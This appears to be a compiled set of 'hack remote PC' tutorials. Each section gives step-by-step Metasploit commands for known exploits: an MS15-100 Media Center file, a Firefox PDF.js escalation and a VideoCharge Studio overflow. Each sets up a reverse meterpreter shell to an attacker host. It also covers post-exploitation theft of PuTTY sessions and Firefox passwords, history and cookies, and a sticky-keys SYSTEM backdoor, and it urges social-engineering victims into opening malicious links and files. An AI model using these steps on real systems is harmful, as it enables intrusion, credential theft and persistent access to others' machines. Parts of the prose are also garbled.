Hack Remote Windows PC using MS15-100 Microsoft Windows Media Center MCL Vulnerability

This module exploits vulnerability in Windows Media Center. By supplying an UNC path in the *.mcl file, a remote file will be automatically downloaded, which can result in arbitrary code execution.

Exploit Targets

Windows 7

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/windows/fileformat/ms15_100_mclexe

msf exploit (ms15_100_mclexe)>set payload windows/meterpreter/reverse_tcp

msf exploit (ms15_100_mclexe)>set lhost 192.168.1.7 (IP of Local Host)

msf exploit (ms15_100_mclexe)>set lport 443

msf exploit (ms15_100_mclexe)>exploit

Now when the victim opens the following link (file://192.168.1.7/aqxtlL/msf.exe) it will show the page like given below

Now type sessions –l to display sessions opened when the victim opens the link

Now the session has opened type sysinfo to get system information, then type shell to enter into Victims command prompt.

How to Hack Saved sessions in Putty using Metasploit

This module will identify whether Pageant (PuTTY Agent) is running and obtain saved session information from the registry. PuTTY is very configurable; some users may have configured saved sessions which could include a username, private key file to use when authenticating, host name etc. If a private key is configured, an attempt will be made to download and store it in loot. It will also record the SSH host keys which have been stored. These will be connections that the user has previously after accepting the host SSH fingerprint and therefore are of particular interest if they are within scope of a penetration test.

Exploit Targets

Putty

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use post/windows/gather/enum_putty_saved_sessions

msf exploit (enum_putty_saved_sessions)>set payload windows/meterpreter/reverse_tcp

msf exploit (enum_putty_saved_sessions)>set lhost 192.168.0.121 (IP of Local Host)

msf exploit (enum_putty_saved_sessions)>set session 1

msf exploit (enum_putty_saved_sessions)>exploit  

The above exploit will save all session in the specified folder. Open the folder and click on session file. It will show us the session information.

Hack Remote PC using Firefox PDF.js Privileged Javascript Injection

This module gains remote code execution on Firefox 35-36 by abusing a privilege escalation bug in resource:// URIs. PDF.js is used to exploit the bug. This exploit requires the user to click anywhere on the page to trigger the vulnerability.

Exploit Targets

Firefox 35-36

Windows 7

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/multi/browser/firefox_pdfjs_privilege_escalation

msf exploit (firefox_pdfjs_privilege_escalation)>set payload windows/meterpreter/reverse_tcp

msf exploit (firefox_pdfjs_privilege_escalation)>set lhost 192.168.0.121 (IP of Local Host)

msf exploit (firefox_pdfjs_privilege_escalation)>set srvhost 192.168.0.121

msf exploit (firefox_pdfjs_privilege_escalation)>set uripath /

msf exploit (firefox_pdfjs_privilege_escalation)>exploit

Now an URL you should give to your victim http://192.168.0.121:8080

Send the link of the server to the victim via chat or email or any social engineering technique

Now when the victim opens the following link (http://192.168.0.121:8080).  It will show the page like given below .And when victim will manually click on the click here option.

Now a session will be opened as shown below.

If you want to gather the user passwords stored through Firefox Browser. Use the following commands.

Now type use post/firefox/gather/passwords

msf exploit (passwords)>set session 1

msf exploit (passwords)>exploit

After running the privileged JavaScript, it will show the path where passwords will be saved.

Now open the file and get the user names and passwords stored through Firefox browser.

To see the history of the Firefox, run the below given exploit.

Now type use post/firefox/gather/history

msf exploit (history)>set session 1

msf exploit (history)>exploit

After running this exploit, go to the path where history entries are stored. It will show us the URLs visited by the victim.

To gather information about the browser cookies, run the given below exploit .

Now type use post/firefox/gather/cookies

msf exploit (cookies)>set session 1

msf exploit (cookies)>exploit  

The above exploit will save all cookies in the specified folder. Open the folder and click on cookies file.It will show us the cookies information.

Windows 7 Sticky Key Hack Attack using Metasploit

Today we will learn how extract login credentials from a victim, who is running Windows System. Using this technique, we can see the Credentials in plain text.

Table of Content:

•                 Introduction to sticky_keys module

•                 Achieve Meterpreter on Remote System

•                 Using sticky_keys module

Requirements:

•                 Attacker: Kali Linux

•                 Targets: Windows 7

Introduction to sticky_keys module

This module makes it conceivable to apply the 'sticky keys' hack to a session with proper rights. The hack gives a way to get a SYSTEM shell utilizing UI-level communication at an RDP login screen or by means of a UAC affirmation discourse.

The module adjusts the Debug library setting for certain executables. The module choices take into consideration this hack to be connected to:

·        SETHC (sethc.exe is invoked when SHIFT is pressed 5 times)

·        UTILMAN (Utilman.exe is invoked by pressing WINDOWS+U)

·        OSK (osk.exe is invoked by pressing WINDOWS+U, then launching the on-screen keyboard)

·        DISP (DisplaySwitch.exe is invoked by pressing WINDOWS+P).

The hack can be included utilizing the ADD activity and expelled with the REMOVE activity. Custom payloads and doubles can be kept running as a component of this endeavor, however, should be physically transferred to the objective before running the module. Naturally, a SYSTEM order brief is introduced utilizing the vault strategy if this module is kept running without changing any parameters.

Achieve Meterpreter on Remote System

Open Kali Linux terminal and type msfconsole in order to load Metasploit framework.  Now we need to compromise victim’s machine once to achieve any type of session either meterpreter or shell and to do so we can read our previous article from here.

Using sticky_keys module

After getting meterpreter on the remote system, now time to use the post exploitation module. But this can’t be done from the meterpreter shell. So, we will use background command in meterpreter session or “Ctrl + z” shortcut to keep the session in background. Now follow the steps shown in the image to use the sticky_keys post exploitation module.

use post/windows/manage/sticky_keys

set session 5

exploit

This will use registry_createkey  command  to edit the Registry on the remote system and replace the sethc.exe  with the cmd.exe. So the next time when we invoke the sticky keys, instead of getting the sticky keys prompt we will get an Administrator Command Prompt. Good thing about sticky keys is that it can be invoked on the Login Screen without entering password. In the similar way it is shown in the given image.

Hack Remote Windows PC using Video Charge Studio Buffer Overflow (SEH)

This module exploits a stack based buffer overflow in VideoCharge Studio 2.12.3.685 when processing a specially crafted .VSC file. This vulnerability could be exploited by a remote attacker to execute arbitrary code on the target machine by enticing a user of VideoCharge Studio to open a malicious .VSC file.

Exploit Targets

VideoCharge Studio 2.12.3.685

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/windows/fileformat/videocharge_studio

msf exploit (videocharge_studio)>set payload windows/meterpreter/reverse_tcp

msf exploit (videocharge_studio)>set lhost 192.168.1.7 (IP of Local Host)

msf exploit (videocharge_studio)>exploit

After we successfully generate the malicious vsc File, it will stored on your local computer

/root/.msf4/local/msf.vsc

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.1.7

exploit

Now send your msf.vsc files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer